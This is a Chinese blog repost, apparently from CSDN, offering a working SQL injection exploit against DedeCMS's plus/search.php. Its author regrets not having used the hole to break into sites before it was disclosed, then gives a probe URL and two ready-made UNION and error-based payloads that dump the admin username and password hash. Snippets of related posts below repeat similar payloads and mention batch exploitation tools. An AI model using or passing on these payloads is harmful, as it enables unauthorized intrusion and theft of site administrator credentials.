【火爆】dedecms plus/search.php 注入漏洞利用方式

最新推荐文章于 2021-03-19 03:11:59 发布
最新推荐文章于 2021-03-19 03:11:59 发布
阅读量786 收藏
点赞数
分类专栏: dede 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_15359/article/details/82513555
版权
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了,我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的:
提交 mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a



看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp

mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a



QQ截图20130119225931.jpg

看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp

mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a



QQ截图20130119225757.jpg

如果正常显示证明漏洞不存在了。
from:http://www.mumaasp.com/180.html
iteye_15359
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dedecms注入漏洞 search.php,Dedecms最新注入漏洞分析及修复方法
weixin_33050117的博客
03-18 1429
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。一. 漏洞跟踪发布时间:2013年6月7日漏洞描述:DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+...
织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
weixin_42104947的博客
03-10 483
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.Hackme论坛原创 转载请附带原文链接作者: c4rp3nt3r@0x50sec.orgDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.算了不公开了,不能糟蹋0day了.传送门 DedeCmS V57 p...
dedecms注入漏洞 search.php,[通杀]dedecms plus/search.php 注入漏洞利用方式
weixin_35909607的博客
03-11 439
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。既然已经发出来了,我就把我自己搞的exp发下吧。。唉。我一般是这样测试的:提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a转载不加作者名的没JJ作者:鬼哥看结果如...
织梦search.php,织梦DEDE plus/search.php注入漏洞修复及借助
weixin_40004960的博客
03-09 433
织梦DEDE的最近出的一高危漏洞,search.php注入漏洞;估计目前大量黑阔都很爱织梦DEDE,由于常常有各种漏洞爆出.大量借助起来也都很容易.下面是漏洞的详细借助细则:0×1:http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a显示错误假如为:Safe Alert: Request Error ste...
织梦search.php,织梦dedecms plus/search.php注入漏洞修复及利用
weixin_39900286的博客
03-09 515
织梦dedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.下面是漏洞的详细利用细节:0×1:http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a报错如果为:Safe Alert: Request Error ...
/plus/search.php sql注入漏洞,vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞
weixin_42556143的博客
03-19 122
====================================================================#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#=============================================================...
织梦search.php,DedeCMS搜索文件search.php移动至根目录的方法
weixin_31174767的博客
03-09 1079
这篇文章主要为大家详细介绍了DedeCMS搜索文件search.php移动至根目录的方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下,有需要的朋友可以收藏方便以后借鉴。织梦默认的搜索页是在根目录下的plus文件夹内的search.php,当你点搜索时候跳转到/plus/search.php,可是做seo的时分会在robots.txt中把plus文件夹屏蔽掉,不让查找引擎收录,所以要把sear...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
最后,我们可以看到Dedecms 5.7 /plus/recommend.php SQL 注入漏洞也存在于推荐页面中,攻击者可以通过构造特殊的输入来 inject恶意SQL语句,从而获取或修改数据库中的数据。 Dedecms漏洞整理报告中包含了多个漏洞...
对某 DedeCMS 二开系统全局变量追加漏洞利用1
08-04
文章提到,开发团队将DedeCMS的重要目录"data"移动到了Web目录之外,同时删除了"plus"文件夹中的大部分文件,这使得许多常见的漏洞利用方式失效。通过分析,作者确定该系统的DedeCMS版本为DEDECMS-V5.7-UTF8-SP2,这...
基于PHP的泊学网dedecms整站源码.zip
08-26
【标题】"基于PHP的泊学网dedecms整站源码.zip" 是一个包含用于构建网站的完整源代码的压缩文件。这个源码是基于PHP编程语言开发的,并使用了知名的CMS(内容管理系统)——Dedecms(织梦内容管理系统)。Dedecms是...
基于PHP的舞曲程序DEDECMS内核源码.zip
最新发布
11-21
基于PHP的舞曲程序DEDECMS内核源码.zip 基于PHP的舞曲程序DEDECMS内核源码.zip 基于PHP的舞曲程序DEDECMS内核源码.zip 基于PHP的舞曲程序DEDECMS内核源码.zip 基于PHP的舞曲程序DEDECMS内核源码.zip
[通杀]dedecms plus/search.php 注入漏洞利用EXP
p656456564545的专栏
11-14 5773
分类:安全 | 2013-01-23 | 撸过6,810次 4人扯谈 哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 webshell.cc/plus/search.php?ke
Dedecms系统实现按“字母检索”搜索功能
weixin_33843409的博客
01-12 149
DEDE系统带“字母索引”功能。 实现方法如下(稍微麻烦一点):注意看红色文字 第一步:首先必须修改数据库结构,增加存放拼音的的字段。 修改dede_archives表,新增pytitle,varchar(250),允许为空。下面是创建表的SQL,仅供参考,红色部分为新增的部分,可以用phpmyadmin直接修改表结构实现。 CREATE TABLE `...
织梦search.php,[通杀]dedecms plus/search.php 注入漏洞利用EXP
weixin_35947010的博客
03-09 493
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。既然已经发出来了,我就把我自己搞的exp发下吧。。唉。我一般是这样测试的:提交http://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a看结果如果提示Safe ...
dede plus ad js.php,织梦dedecms/plus/文件夹的功能介绍
weixin_39988930的博客
03-19 184
/plus /–插件及辅助功能目录后台系统插件和辅助功能文件存放目录,你有什么辅助功能或者第三方开发的插件你需要用那么久需要放在这个文件夹中,文件夹中有dedecms自带的常用插件:plus 系统插件存放目录guestbook 留言板插件ad_js.php 广告插件advancedsearch.php 搜索bookfeedback.php 评论相关bookfeedback_js.php 评论相关b...
织梦search.php,DeDecms最新plus/search.php漏洞批量利用工具
weixin_39829236的博客
03-09 529
获取密码网址/plus/search.php?typeArr[1'or `@\'`=1 and (SELECT 1 FROM (selectcount(*),concat(floor(rand(0)*2),(substring((Select pwd fromdede_admin limit 1,1),1,62)))a from information_schema.tables groupby ...
dedecms v56 plus/search.php 注入漏洞
09-22
dedecms v56 plus 是一个开源的内容管理系统,其中的 search.php 文件存在注入漏洞。 这个注入漏洞允许攻击者通过构造恶意的请求,在 search.php 页面中执行恶意的 SQL 代码。攻击者可以利用这个漏洞获取敏感的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值